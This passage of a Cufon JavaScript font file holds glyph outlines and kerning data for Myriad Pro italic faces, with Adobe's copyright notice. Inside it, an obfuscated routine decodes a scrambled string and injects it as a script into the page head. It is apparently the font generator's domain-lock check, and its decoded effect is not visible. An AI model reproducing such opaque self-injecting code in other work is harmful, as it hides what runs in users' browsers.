2,"k":-2,"l":-2,":":6,";":6,"-":8,")":-13,"]":-13,"}":-13,"\"":-4,"'":-4,",":19,".":19}},{"d":"127,-31r3,24v-9,5,-27,11,-50,11v-45,0,-67,-31,-67,-68v0,-71,69,-137,143,-106r-9,23v-54,-24,-107,28,-103,80v-6,47,54,54,83,36","w":152,"k":{"T":8,"f":-3,"c":3,"d":3,"e":3,"o":3,"q":3,"s":-1,"t":-2,"v":-4,"w":-4,"y":-4,"x":-1,"a":5,",":4,".":4}},{"d":"57,-243r30,0r-19,103r111,0r20,-103r30,0r-46,243r-30,0r21,-114r-111,0r-22,114r-30,0","w":225,"k":{"f":-3,"t":-2,"v":-2,"w":-2,"y":-2,"z":-3}},{"d":"200,-122r-180,0r0,-21r180,0r0,21xm200,-51r-180,0r0,-21r180,0r0,21","w":214},{"d":"141,0r-141,0r4,-20v52,-43,143,-114,134,-157v0,-17,-9,-35,-36,-35v-21,0,-38,9,-49,17r-7,-22v16,-12,40,-21,62,-21v44,0,61,29,61,57v0,55,-67,112,-121,155r98,0"},{"d":"243,0r-28,0r29,-213v-33,72,-73,143,-110,212r-23,0r-18,-131v-5,-27,-5,-58,-9,-81r-51,213r-28,0r63,-243r38,0r26,200v30,-69,69,-135,103,-200r39,0","w":280,"k":{"C":1,"G":1,"O":1,"Q":1,"Y":1,"j":-4,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"v":-3,"w":-3,"y":-3}},{"d":"20,4r4,-26v61,1,98,-38,114,-86v-34,46,-111,23,-111,-36v0,-48,38,-94,87,-94v110,0,49,178,3,208v-30,20,-56,34,-97,34xm93,-107v30,0,54,-23,54,-61v0,-27,-10,-46,-36,-46v-29,0,-53,33,-53,67v0,23,12,40,35,40"},{"d":"48,-234r140,0r-4,21r-135,213r-34,0r135,-208r-107,0"},{"d":"40,0r-30,0r22,-112v4,-23,6,-46,8,-62r27,0v0,11,-5,27,-4,38v13,-26,32,-46,62,-41r-6,29v-59,-10,-68,89,-79,148","w":114,"k":{"T":8,"f":-8,"g":3,"c":2,"d":2,"e":2,"o":2,"q":2,"t":-9,"v":-7,"w":-7,"y":-7,"x":-4,"z":-3,"a":5,":":-4,";":-4,"-":3,",":13,".":13}},{"d":"5,14r-24,0r144,-261r25,0","w":117},{"d":"-7,0r3,-18r165,-199r-116,0r5,-26r156,0r-4,20r-163,197r127,0r-4,26r-169,0","w":188,"k":{"A":-2,"C":8,"G":8,"O":8,"Q":8,"V":-6,"W":-6,"X":-1,"g":4,"c":3,"d":3,"e":3,"o":3,"q":3,"u":2,"a":4,"-":3}},{"d":"40,0r-30,0r49,-256r30,0r-21,112v15,-21,36,-34,62,-34v30,0,47,36,40,76r-19,102r-30,0r22,-125v0,-16,-8,-28,-27,-28v-23,0,-53,27,-60,66","w":192,"k":{"T":21,"u":2,"v":2,"w":2,"y":2,"x":1,"\"":13,"'":13}},{"d":"39,0r-28,0r46,-243r33,0r55,138v11,27,17,46,22,67v5,-62,25,-142,35,-205r28,0r-46,243r-29,0v-25,-66,-62,-137,-78,-207","w":227,"k":{"f":-3,"t":-2,"v":-2,"w":-2,"y":-2,"z":-3}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+225-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("^.3s|Qi,BKp6^vDrFQ&1C.CpkGis3Qp6kG>1BKMW3t`ua2,7|{>&k$FriDsAU.&Wo1joFvM|oDo#o4#>3taOBo`Q|KusaS#9|WFwFDDaaDb7U(DQUKMcqEHD^Rh{A4{6MWfhH{iHqs=sHEj)H{hNA&=U>1b}5Eg,CKp^F_ijNjvE{&.SC>^~Hi5qcM_4otKka3B|UFJAf)7R$DQW}#wOuh6@b=12,sG(g!dr`p9ytGiCq4>i54F1kvpBB{g7~Wib|.D,^vC7^_=#q4NuUEs7~WNu|Esb~Q=D|QF,Bv=WqKC637!W|SDbBSHpJ(,rBKa}a7!@B2,@k7fy5WF(Fsb6^4`}q2#u|Gi)|.)@U(M`aQtu|.&7|Gp7aK>Dkv!R|G,#>vp#~WMDU(c}|.pRakM#|Gg6B.p2F.!)|Ko#^K3@U7frB4=u51uOB_DWKGi|BtsFqkj|Btsp^_f#")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":177,"face":{"font-family":"myriadpro","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 3 4 3 9 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-40 -270 322 90","underline-thickness":"18","underline-position":"-18","slope":"-11","stemh":"23","stemv":"32","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 1992, 1994, 1997, 2000, 2004 Adobe Systems Incorporated. All rights reserved.
 * Protected by U.S. Patents D454,582.
 * 
 * Trademark:
 * Myriad is either a registered trademark or a trademark of Adobe Systems
 * Incorporated in the United States and/or other countries.
 * 
 * Full name:
 * MyriadPro-BoldIt
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 * 
 * License information:
 * http://www.adobe.com/type/legal.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"106,0r-52,0r19,-99r-47,-144r55,0r26,106r61,-106r62,0r-105,143","w":205,"k":{"i":16,"A":29,"J":24,"C":16,"G":16,"O":16,"Q":16,"U":5,"V":1,"W":1,"X":6,"M":7,"S":7,"B":6,"D":6,"E":6,"F":6,"H":6,"I":6,"K":6,"L":6,"N":6,"P":6,"R":6,"a":39,"g":35,"b":5,"h":5,"k":5,"l":5,"j":9,"m":16,"n":16,"p":16,"r":16,"c":32,"d":32,"e":32,"o":32,"q":32,"t":12,"u":26,"v":17,"w":17,"y":17,"x":20,"z":24,"s":30,":":13,";":13,"-":26,")":-8,"]":-8,"}":-8,"\"":-2,"'":-2,",":36,".":36}},{"d":"260,0r-50,0r29,-195v-28,69,-59,128,-91,191r-40,0r-15,-191r-44,195r-48,0r61,-243r69,0r12,170r2,0v22,-63,50,-113,77,-170r71,0","w":295,"k":{"C":3,"G":3,"O":3,"Q":3,"j":-3}},{"d":"141,0r-48,0r10,-57r-99,0r6,-34r112,-143r63,0r-26,138r28,0r-7,39r-28,0xm62,-97v13,3,34,0,49,1r22,-97v-14,12,-20,31,-32,46"},{"d":"151,-247v137,0,115,206,21,236v13,7,36,9,56,14r-18,41v-41,-12,-77,-30,-108,-41v-47,-3,-85,-40,-85,-101v0,-77,54,-149,134,-149xm123,-39v49,-1,69,-61,70,-106v0,-27,-10,-58,-48,-58v-51,0,-72,61,-73,105v0,34,16,59,51,59","w":253,"k":{"T":13,"A":5,"V":3,"W":3,"X":4,"Y":16,"a":-3,"f":-5,"g":-3,"b":-1,"h":-1,"k":-1,"l":-1,"j":2,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":-3,"d":-3,"e":-3,"o":-3,"q":-3,"t":-4,"u":-1,"v":-2,"w":-2,"y":-2,"x":4,"s":-1,":":1,";":1,"-":-5,",":6,".":6}},{"d":"72,-127v9,23,66,32,61,69v7,59,-92,77,-134,48r12,-36v13,8,66,23,68,-4v-4,-25,-66,-34,-59,-70v-7,-53,80,-73,123,-51r-13,36v-11,-6,-59,-15,-58,8","w":149,"k":{"T":15,"-":1,",":4,".":4}},{"d":"134,-45r1,39v-50,24,-125,4,-125,-62v0,-74,72,-130,151,-106r-13,40v-42,-19,-83,19,-83,60v0,40,44,41,69,29","w":156,"k":{"T":8,"a":4,"f":-3,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-5,"v":-4,"w":-4,"y":-4,"x":-3,"z":-1,"s":-3,",":3,".":3}},{"d":"168,0r-48,0v0,-10,1,-22,2,-35v-30,60,-113,50,-113,-22v0,-59,40,-123,126,-123v21,0,43,4,58,9v-9,53,-26,111,-25,171xm84,-38v25,7,48,-62,51,-101v-43,-12,-71,35,-72,72v0,17,7,29,21,29","w":199},{"d":"113,-69v-6,-36,-91,-47,-83,-98v-8,-70,101,-95,153,-67r-16,43v-15,-14,-82,-17,-82,15v0,14,14,23,35,34v30,16,48,35,48,64v0,82,-116,99,-168,65r17,-43v23,16,93,28,96,-13","w":183,"k":{"A":2,"J":-2,"C":3,"G":3,"O":3,"Q":3,"X":-1,"a":-4,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":-3,"d":-3,"e":-3,"o":-3,"q":-3,"v":8,"w":8,"y":8,"x":3}},{"d":"53,-256r52,0r-20,101v13,-15,32,-25,54,-25v37,0,53,31,53,62v0,57,-37,122,-116,122v-57,0,-68,-34,-59,-81xm115,-138v-28,-1,-49,42,-48,83v0,13,7,20,19,20v30,0,52,-42,52,-73v0,-17,-7,-30,-23,-30","w":201,"k":{"T":22,"g":-2,"j":5,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"v":3,"w":3,"y":3,"x":5,"z":3,"-":-5,"\"":8,"'":8,",":5,".":5}},{"d":"18,2v-1,-23,15,-53,16,-74v0,-10,-7,-18,-23,-18r5,-27v48,-3,31,-46,39,-81v9,-38,33,-51,75,-49r-6,30v-60,-5,-15,112,-75,114v44,9,10,67,8,97v0,12,9,17,24,16r-5,30v-33,2,-58,-6,-58,-38","w":113,"k":{"T":-8,"A":4,"C":5,"G":5,"O":5,"Q":5,"V":-8,"W":-8,"X":-3,"Y":-6,"j":-10,"c":2,"d":2,"e":2,"o":2,"q":2}},{"d":"17,-97v0,-79,52,-150,133,-150v64,0,98,44,98,102v1,80,-50,150,-132,149v-63,0,-99,-44,-99,-101xm123,-39v49,0,70,-61,70,-105v0,-30,-11,-59,-49,-59v-49,0,-71,60,-72,104v0,34,16,60,51,60","w":253,"k":{"T":13,"A":5,"V":3,"W":3,"X":4,"Y":16,"a":-3,"f":-5,"g":-3,"b":-1,"h":-1,"k":-1,"l":-1,"j":2,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":-3,"d":-3,"e":-3,"o":-3,"q":-3,"t":-4,"u":-1,"v":-2,"w":-2,"y":-2,"x":4,"s":-1,":":1,";":1,"-":-5,",":6,".":6}},{"d":"57,0r-52,0r19,-105v5,-27,7,-56,9,-71r45,0v0,11,-4,26,-2,36v16,-26,33,-43,66,-40r-10,51v-64,-9,-63,74,-75,129","w":133,"k":{"T":9,"a":3,"f":-9,"g":1,"t":-9,"v":-8,"w":-8,"y":-8,"x":-4,"z":-3,":":-1,";":-1,"-":1,",":15,".":15}},{"d":"144,-63r-70,0r-29,63r-55,0r118,-243r67,0r28,243r-55,0xm89,-103r52,0r-9,-99","w":222,"k":{"T":23,"A":5,"J":-2,"C":10,"G":10,"O":10,"Q":10,"U":12,"V":18,"W":18,"X":4,"Y":24,"a":1,"f":1,"g":4,"b":-2,"h":-2,"k":-2,"l":-2,"j":-4,"i":-3,"m":-3,"n":-3,"p":-3,"r":-3,"c":4,"d":4,"e":4,"o":4,"q":4,"t":2,"u":2,"v":9,"w":9,"y":9,"x":-1,"z":-5,"\"":13,"'":13}},{"d":"16,-113r93,0r-7,37r-93,0","w":115,"k":{"T":22,"J":4,"C":-6,"G":-6,"O":-6,"Q":-6,"V":10,"W":10,"X":4,"Y":19,"S":1,"a":-8,"g":-8,"c":-7,"d":-7,"e":-7,"o":-7,"q":-7,"v":1,"w":1,"y":1}},{"d":"199,-117r-184,0r0,-33r184,0r0,33xm199,-42r-184,0r0,-34r184,0r0,34","w":214},{"d":"53,-238v58,-12,155,-13,155,55v0,37,-26,58,-55,70v31,7,23,91,32,113r-53,0v-2,-6,-5,-27,-7,-57v-3,-37,-17,-40,-49,-39r-18,96r-51,0xm97,-202r-13,67v38,3,70,-9,70,-40v0,-27,-33,-33,-57,-27","w":209,"k":{"T":5,"A":-4,"U":3,"V":3,"W":3,"X":-1,"Y":8,"a":6,"g":6,"b":-2,"h":-2,"k":-2,"l":-2,"i":-2,"m":-2,"n":-2,"p":-2,"r":-2,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-3,"u":2,"v":-2,"w":-2,"y":-2}},{"d":"18,-176r53,0r-1,131v16,-46,37,-88,56,-131r43,0r6,131v14,-46,31,-89,49,-131r52,0r-86,176r-48,0r-7,-118v-17,49,-32,76,-51,118r-49,0","w":263,"k":{"T":12,"a":8,"g":8,"j":4,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-1,"v":-6,"w":-6,"y":-6,"s":1,"-":3,",":16,".":16}},{"d":"62,0r-51,0r26,-137r-23,0r7,-39v11,-1,25,4,25,-9v0,-47,53,-92,107,-70r-9,41v-27,-11,-48,10,-49,38r35,0r-8,39r-34,0","w":118,"k":{"a":3,"t":-4,"v":-2,"w":-2,"y":-2,":":-10,";":-10,")":-20,"]":-20,"}":-20,"\"":-19,"'":-19,",":10,".":10}},{"w":66},{"d":"119,0r-60,0r-30,-243r53,0r18,190v25,-64,58,-128,86,-190r58,0","w":219,"k":{"T":-8,"A":19,"J":13,"C":5,"G":5,"O":5,"Q":5,"Y":-1,"M":3,"S":1,"a":18,"g":18,"i":8,"m":8,"n":8,"p":8,"r":8,"c":14,"d":14,"e":14,"o":14,"q":14,"u":9,"v":1,"w":1,"y":1,"x":9,"z":9,"s":12,":":8,";":8,"-":13,")":-7,"]":-7,"}":-7,"\"":-3,"'":-3,",":23,".":23}},{"d":"51,-210r53,-14r-9,48r38,0r-8,39r-38,0r-14,82v-3,15,15,17,29,14r-6,41v-31,12,-81,-1,-77,-34v4,-33,13,-71,18,-103r-23,0r8,-39r22,0","w":125,"k":{"a":1,"g":3,"c":2,"d":2,"e":2,"o":2,"q":2,"v":-3,"w":-3,"y":-3,",":3,".":3}},{"d":"3,-12r16,-41v19,17,103,20,97,-20v1,-24,-24,-33,-57,-31r8,-40v28,1,59,-8,60,-31v1,-30,-63,-19,-77,-8r-7,-39v43,-26,140,-24,139,39v0,29,-23,51,-52,58v24,5,40,25,40,52v0,73,-116,95,-167,61"},{"d":"173,-147r-8,44r-87,0r-11,59r97,0r-8,44r-149,0r46,-243r144,0r-9,45r-92,0r-10,51r87,0","w":186,"k":{"V":-2,"W":-2,"Y":-1,"a":2,"f":-1,"g":2,"j":-1,"c":2,"d":2,"e":2,"o":2,"q":2,"u":1,"v":4,"w":4,"y":4,"z":-1,",":3,".":3}},{"d":"35,4v-17,0,-29,-13,-29,-30v0,-20,14,-37,35,-37v18,0,30,13,30,31v0,21,-15,36,-36,36","w":93,"k":{"T":23,"A":-4,"J":-3,"V":20,"W":20,"X":-5,"Y":28,"Z":-5,"\"":53,"'":53}},{"d":"57,0r-52,0r49,-256r51,0","w":95,"k":{"v":-1,"w":-1,"y":-1,",":4,".":4}},{"d":"43,-252r50,0r27,55r-37,0","w":142},{"d":"116,-180v47,0,74,32,74,72v0,64,-44,112,-105,112v-45,0,-74,-29,-74,-73v0,-61,42,-111,105,-111xm109,-141v-30,0,-45,44,-45,71v0,21,11,34,29,34v28,0,44,-41,44,-71v0,-16,-7,-34,-28,-34","w":201,"k":{"T":22,"g":-2,"j":5,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"v":3,"w":3,"y":3,"x":5,"z":3,"-":-5,"\"":8,"'":8,",":5,".":5}},{"d":"31,-270r36,0r0,360r-36,0r0,-360","w":86},{"w":66},{"d":"67,-80r-41,0r24,-163r55,0xm34,4v-17,0,-29,-13,-29,-30v0,-19,14,-36,35,-36v17,0,29,13,29,31v0,21,-14,35,-35,35","w":96},{"d":"17,-176r53,0r14,125v13,-36,38,-88,55,-125r58,0r-98,176r-53,0","w":184,"k":{"T":12,"a":8,"g":8,"j":4,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-1,"v":-6,"w":-6,"y":-6,"s":1,"-":3,",":16,".":16}},{"d":"57,0r-52,0r33,-176r52,0xm102,-227v0,18,-14,29,-32,29v-14,0,-25,-10,-25,-25v-2,-36,57,-40,57,-4","w":95,"k":{")":-1,"]":-1,"}":-1}},{"d":"41,-249r49,0r-27,100r-33,0xm111,-249r48,0r-27,100r-33,0","w":139,"k":{"A":13,"J":23,"X":-2,"Y":-5,"f":-16,"b":-7,"h":-7,"k":-7,"l":-7,"t":-13,",":48,".":48}},{"d":"22,14r-36,0r125,-261r37,0","w":117},{"d":"144,-176r51,0r-31,176r-46,0r3,-29v-30,43,-106,51,-106,-16v0,-46,16,-89,22,-131r52,0r-21,118v0,11,5,20,18,20v42,-1,49,-92,58,-138","w":201,"k":{"T":16,"a":4,"g":4,"j":-2,"x":3,",":4,".":4}},{"d":"17,40r-38,3v16,-32,32,-69,41,-102r56,-4v-17,37,-38,75,-59,103","w":93,"k":{"T":23,"A":-4,"J":-3,"V":20,"W":20,"X":-5,"Y":28,"Z":-5,"\"":53,"'":53}},{"d":"186,0r-55,0r-30,-90r-53,90r-63,0r91,-124r-43,-119r55,0r27,87v17,-33,33,-57,51,-87r62,0r-88,120","w":204,"k":{"T":-5,"A":6,"J":-2,"C":12,"G":12,"O":12,"Q":12,"V":-7,"W":-7,"X":-6,"Y":-8,"Z":-2,"a":9,"g":9,"c":8,"d":8,"e":8,"o":8,"q":8,"t":-1,"u":6,"v":12,"w":12,"y":12,"s":2,"-":8,")":-6,"]":-6,"}":-6,"\"":-3,"'":-3,",":-1,".":-1}},{"d":"199,-112r0,33r-172,79r0,-38r132,-58r-132,-58r0,-38","w":214},{"d":"-19,27r180,0r-4,18r-180,0","w":180},{"d":"57,0r-52,0r48,-256r52,0r-19,103v26,-36,103,-40,100,21v-2,47,-15,89,-22,132r-52,0v7,-39,18,-75,21,-118v0,-12,-5,-20,-18,-20v-42,2,-49,92,-58,138","w":202,"k":{"T":25,"u":3,"v":4,"w":4,"y":4,"x":3,"\"":12,"'":12}},{"d":"149,71r-51,0r20,-97v-32,51,-109,34,-109,-37v0,-56,39,-117,120,-117v26,0,48,5,65,10xm85,-38v34,0,47,-61,52,-99v-43,-16,-74,28,-74,68v0,21,9,31,22,31","w":201,"k":{"T":16,"a":4,"g":4,"j":-2,"x":3,",":4,".":4}},{"d":"100,-209v1,23,-15,53,-16,74v0,10,7,18,23,18r-5,28v-48,2,-31,46,-39,81v-9,38,-33,50,-75,48r6,-30v59,5,15,-112,75,-114v-46,-8,-10,-66,-8,-96v1,-13,-9,-19,-24,-17r5,-30v33,-2,58,6,58,38","w":113},{"d":"4,64r12,-40v44,24,103,6,101,-52v-30,49,-107,26,-107,-36v0,-58,41,-116,118,-116v25,0,46,4,65,12v-19,76,-13,177,-63,223v-30,27,-93,24,-126,9xm89,-41v31,2,43,-60,48,-96v-41,-15,-72,26,-72,65v0,18,8,31,24,31","w":200,"k":{"T":17,"a":2,"g":4,",":5,".":5}},{"d":"206,-177v-3,68,-61,97,-132,90r-16,87r-51,0r45,-238v63,-14,157,-10,154,61xm96,-202r-14,72v35,9,72,-11,72,-42v0,-31,-32,-33,-58,-30","w":201,"k":{"T":5,"A":21,"J":27,"X":12,"Z":10,"B":-2,"D":-2,"E":-2,"F":-2,"H":-2,"I":-2,"K":-2,"L":-2,"N":-2,"P":-2,"R":-2,"a":5,"g":7,"i":1,"m":1,"n":1,"p":1,"r":1,"c":4,"d":4,"e":4,"o":4,"q":4,"t":-7,"u":1,"v":-5,"w":-5,"y":-5,"s":1,":":4,";":4,"-":3,")":5,"]":5,"}":5,",":30,".":30}},{"d":"7,0r46,-243r142,0r-9,45r-90,0r-11,57r85,0r-9,43r-84,0r-18,98r-52,0","w":183,"k":{"A":22,"J":28,"C":4,"G":4,"O":4,"Q":4,"X":4,"M":3,"a":13,"g":12,"b":4,"h":4,"k":4,"l":4,"i":5,"m":5,"n":5,"p":5,"r":5,"c":9,"d":9,"e":9,"o":9,"q":9,"u":7,"v":5,"w":5,"y":5,"x":11,"s":6,":":4,";":4,",":21,".":21}},{"d":"90,-192r35,0r0,79r74,0r0,33r-74,0r0,80r-35,0r0,-80r-75,0r0,-33r75,0r0,-79","w":214},{"d":"125,-247r30,19r-44,46r60,-12r-8,37v-18,-2,-38,-9,-55,-9r35,44r-35,19r-14,-56r-27,56r-30,-19r44,-45r-58,10r7,-37v17,3,38,11,53,11r-33,-46r34,-18v6,18,8,40,15,56","w":162},{"d":"56,0r-52,0r32,-176r46,0v0,9,-4,22,-2,29v27,-44,107,-49,106,15v-1,49,-15,88,-22,132r-52,0v6,-39,18,-74,20,-117v0,-13,-4,-21,-17,-21v-39,-1,-51,93,-59,138","w":202,"k":{"T":25,"u":3,"v":4,"w":4,"y":4,"x":3,"\"":12,"'":12}},{"d":"220,0r-62,0v-5,-5,-9,-11,-13,-17v-37,37,-140,25,-140,-43v0,-38,30,-59,59,-76v-33,-48,1,-111,63,-111v36,0,61,22,61,54v0,29,-23,48,-60,68v10,15,23,34,33,47v15,-18,26,-40,33,-62r48,0v-13,37,-31,69,-58,95v9,14,22,29,36,45xm58,-69v0,33,48,44,67,23v-12,-16,-29,-39,-43,-61v-11,8,-24,20,-24,38xm122,-213v-27,0,-32,43,-14,61v19,-9,34,-22,34,-40v0,-11,-6,-21,-20,-21","w":239},{"d":"66,0r34,-185r-46,20r-1,-41r64,-28r43,0r-44,234r-50,0"},{"d":"56,0r-51,0r48,-256r52,0r-29,153r61,-73r64,0r-75,73r49,103r-58,0r-31,-75r-19,18","w":190,"k":{"T":13,"a":10,"g":9,"b":-1,"h":-1,"k":-1,"l":-1,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":9,"d":9,"e":9,"o":9,"q":9,"u":3,"v":1,"w":1,"y":1,":":-1,";":-1,",":-1,".":-1}},{"d":"207,-194v-63,-26,-140,16,-133,89v-6,58,61,76,110,56r5,42v-13,6,-35,11,-64,11v-64,0,-107,-39,-107,-103v0,-106,104,-172,203,-137","w":209,"k":{"T":-1,"A":-3,"J":-2,"C":9,"G":9,"O":9,"Q":9,"V":-2,"W":-2,"X":-2,"Y":-1,"M":-3,"a":4,"g":4,"c":2,"d":2,"e":2,"o":2,"q":2,"u":2,"v":6,"w":6,"y":6,"z":-4,"-":1,")":-3,"]":-3,"}":-3}},{"d":"26,42r-39,0v54,-65,90,-182,54,-290r37,0v44,98,6,235,-52,290","w":113},{"d":"117,-68v-5,-35,-83,-45,-83,-94v0,-36,29,-63,73,-68r6,-32r34,0r-6,31v20,1,38,8,47,14r-17,38v-12,-12,-84,-23,-81,10v0,11,10,18,36,31v28,14,47,34,47,62v0,44,-36,68,-77,73r-6,34r-34,0r6,-34v-22,-1,-45,-11,-56,-19r17,-39v17,19,91,30,94,-7"},{"d":"159,0r-160,0r6,-33v41,-32,127,-94,127,-133v0,-38,-63,-31,-81,-15r-11,-37v45,-35,146,-24,146,44v0,58,-61,96,-103,130r84,0"},{"d":"42,71r-52,0r45,-248r46,0r-3,27v14,-19,36,-30,57,-30v38,0,57,31,57,67v0,72,-61,138,-136,110xm115,-138v-31,0,-47,56,-51,94v37,29,75,-20,74,-65v0,-14,-6,-29,-23,-29","w":202,"k":{"T":22,"g":-2,"j":5,"c":-2,"d":-2,"e":-2,"o":-2,"q":-2,"v":3,"w":3,"y":3,"x":5,"z":3,"-":-5,"\"":8,"'":8,",":5,".":5}},{"d":"222,-191v-66,-30,-148,11,-148,88v0,51,45,72,89,57r10,-51r-38,0r8,-41r88,0r-24,127v-18,6,-47,14,-78,14v-65,1,-109,-38,-112,-102v-5,-109,118,-173,221,-135","w":242,"k":{"T":4,"J":-2,"V":5,"W":5,"Y":5,"M":-1,"a":-1,"v":4,"w":4,"y":4}},{"d":"55,0r-50,0r31,-176r44,0r-3,28v21,-42,98,-42,103,1v25,-43,103,-49,103,14v0,47,-15,89,-22,133r-50,0r20,-118v0,-12,-5,-21,-17,-21v-39,2,-48,93,-56,139r-50,0r20,-117v0,-12,-3,-22,-16,-22v-41,2,-49,93,-57,139","w":299,"k":{"T":25,"u":3,"v":4,"w":4,"y":4,"x":3,"\"":12,"'":12}},{"d":"72,40r-72,0r55,-287r72,0r-6,30r-33,0r-44,227r34,0","w":113,"k":{"T":-8,"A":4,"C":5,"G":5,"O":5,"Q":5,"V":-8,"W":-8,"X":-3,"Y":-6,"j":-10,"c":2,"d":2,"e":2,"o":2,"q":2}},{"d":"70,-89r29,-154r52,0r-31,161v-10,77,-64,97,-133,80r10,-44v37,9,64,5,73,-43","w":143,"k":{"A":4,"v":-4,"w":-4,"y":-4,")":-5,"]":-5,"}":-5}},{"d":"42,-249r48,0r-26,100r-33,0","w":71,"k":{"A":13,"J":23,"X":-2,"Y":-5,"f":-16,"b":-7,"h":-7,"k":-7,"l":-7,"t":-13,",":48,".":48}},{"d":"94,-248r38,0v-54,65,-90,182,-54,290r-36,0v-45,-97,-6,-236,52,-290","w":113,"k":{"T":-8,"A":4,"C":5,"G":5,"O":5,"Q":5,"V":-8,"W":-8,"X":-3,"Y":-6,"j":-10,"c":2,"d":2,"e":2,"o":2,"q":2}},{"d":"80,-97r31,0r13,-41r-31,0xm49,0r-32,0r20,-64r-29,0r5,-33r35,0r14,-41r-31,0r5,-33r35,0r20,-63r32,0r-20,63r31,0r20,-63r32,0r-20,63r29,0r-5,33r-34,0r-13,41r30,0r-6,33r-35,0r-20,64r-32,0r20,-64r-31,0"},{"d":"53,-243r52,0r-18,95r88,0r18,-95r52,0r-46,243r-52,0r19,-102r-88,0r-19,102r-52,0","w":239,"k":{"f":-1,"t":-1,"z":-1}},{"d":"185,-237r-8,42v-52,-1,-89,23,-102,56v39,-37,108,-14,108,48v0,50,-38,95,-93,95v-117,-2,-80,-167,-21,-207v33,-22,70,-36,116,-34xm130,-86v-1,-50,-62,-35,-67,1v-3,25,5,49,28,49v25,0,39,-28,39,-50"},{"d":"17,40r-38,3v16,-32,32,-69,41,-102r56,-4v-16,37,-38,75,-59,103xm59,-112v-17,0,-29,-13,-29,-30v0,-19,14,-36,35,-36v17,0,30,12,30,30v0,21,-15,36,-36,36","w":93},{"d":"-9,0r5,-31r58,-62r43,-41r-75,0r8,-42r137,0r-6,33r-56,59r-43,42r83,0r-8,42r-146,0","w":162,"k":{"T":11,"f":-5,"t":-2,"v":-4,"w":-4,"y":-4}},{"d":"-9,0r5,-30r141,-168r-98,0r9,-45r168,0r-6,32r-139,166r109,0r-9,45r-180,0","w":199,"k":{"A":-4,"J":-1,"C":9,"G":9,"O":9,"Q":9,"V":-3,"W":-3,"X":-3,"Y":-2,"a":8,"g":7,"i":-1,"m":-1,"n":-1,"p":-1,"r":-1,"c":4,"d":4,"e":4,"o":4,"q":4,"v":2,"w":2,"y":2,"-":1,")":-2,"]":-2,"}":-2}},{"d":"57,-112v-17,0,-29,-13,-29,-30v0,-19,14,-36,35,-36v17,0,30,12,30,30v0,21,-15,36,-36,36xm35,4v-17,0,-29,-13,-29,-30v0,-19,14,-36,35,-36v17,0,30,13,30,31v0,21,-15,35,-36,35","w":93},{"d":"45,-247r73,0r-55,287r-72,0r5,-30r34,0r43,-227r-33,0","w":113},{"d":"51,0r37,-197r-64,0r9,-46r180,0r-8,46r-65,0r-37,197r-52,0","w":189,"k":{"i":19,"T":-9,"A":22,"J":17,"C":6,"G":6,"O":6,"Q":6,"V":-13,"W":-13,"X":-10,"Y":-12,"S":-2,"a":29,"g":28,"m":19,"n":19,"p":19,"r":19,"c":26,"d":26,"e":26,"o":26,"q":26,"u":21,"v":15,"w":15,"y":15,"x":15,"z":18,"s":25,":":8,";":8,"-":24,")":-9,"]":-9,"}":-9,"\"":-4,"'":-4,",":25,".":25}},{"d":"59,-68v1,40,62,37,89,20r4,38v-61,30,-142,13,-142,-61v0,-54,39,-109,103,-109v36,0,61,20,61,53v0,45,-44,61,-115,59xm125,-127v0,-9,-7,-15,-19,-15v-24,0,-38,20,-42,36v41,0,61,-4,61,-21","w":180,"k":{"T":19,"j":2,"c":-1,"d":-1,"e":-1,"o":-1,"q":-1,"v":2,"w":2,"y":2,"x":1,"-":-2,",":4,".":4}},{"d":"99,-238v32,0,52,23,52,54v0,51,-33,90,-75,90v-31,0,-54,-20,-54,-55v0,-47,31,-89,77,-89xm94,-208v-21,0,-32,38,-32,60v0,14,6,25,18,25v22,0,31,-41,31,-62v0,-12,-4,-23,-17,-23xm89,4r-31,0r174,-242r31,0xm249,-141v32,0,51,23,51,54v0,51,-33,90,-75,90v-31,0,-53,-20,-53,-55v0,-47,31,-89,77,-89xm243,-111v-21,0,-32,38,-32,60v0,14,6,24,18,24v22,0,32,-40,32,-61v0,-12,-5,-23,-18,-23","w":312},{"d":"100,0r-58,0r-9,-243r53,0r-1,187r72,-187r57,0r-2,186r26,-78r42,-108r55,0r-107,243r-56,0r-2,-100v-1,-27,2,-56,1,-80v-18,60,-46,124,-71,180","w":311,"k":{"T":-8,"A":19,"J":13,"C":5,"G":5,"O":5,"Q":5,"Y":-1,"M":3,"S":1,"a":18,"g":18,"i":8,"m":8,"n":8,"p":8,"r":8,"c":14,"d":14,"e":14,"o":14,"q":14,"u":9,"v":1,"w":1,"y":1,"x":9,"z":9,"s":12,":":8,";":8,"-":13,")":-7,"]":-7,"}":-7,"\"":-3,"'":-3,",":23,".":23}},{"d":"33,-167v0,-80,154,-101,156,-14v0,25,-17,44,-42,56v21,12,32,32,32,52v0,94,-173,103,-173,17v0,-34,26,-54,51,-67v-1